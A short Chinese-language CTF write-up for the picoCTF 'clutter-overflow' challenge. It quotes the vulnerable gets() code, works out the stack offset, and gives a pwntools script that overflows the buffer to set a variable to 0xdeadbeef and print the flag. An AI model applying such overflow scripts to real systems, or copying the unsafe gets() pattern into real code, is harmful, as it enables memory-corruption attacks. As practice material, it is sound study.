題目 clutter-overflow

關鍵大概在下面幾行
clutter buffer為256
code要等於0xdeadbeef才會output flag

#define SIZE 0x100
#define GOAL 0xdeadbeef
char clutter[SIZE];
gets(clutter);

  if (code == GOAL) {
    printf("code == 0x%llx: how did that happen??\n", GOAL);
    puts("take a flag for your troubles");
    system("cat flag.txt");
  } else {
    printf("code == 0x%llx\n", code);
    printf("code != 0x%llx :(\n", GOAL);
  }

一樣跟之前去找offset的數

找到code是272，但我們的目的主要不是overflow
為了讓 code 的值變成 0xdeadbeef
0xdeadbeef有8 bytes
所以要填滿272-8=264個字元

script

from pwn import *

r = process("./chall")
# r = remote("mars.picoctf.net",31890)

r.recvline("What do you see?")
r.sendline(b"A"*264+p64(0xdeadbeef))
r.interactive()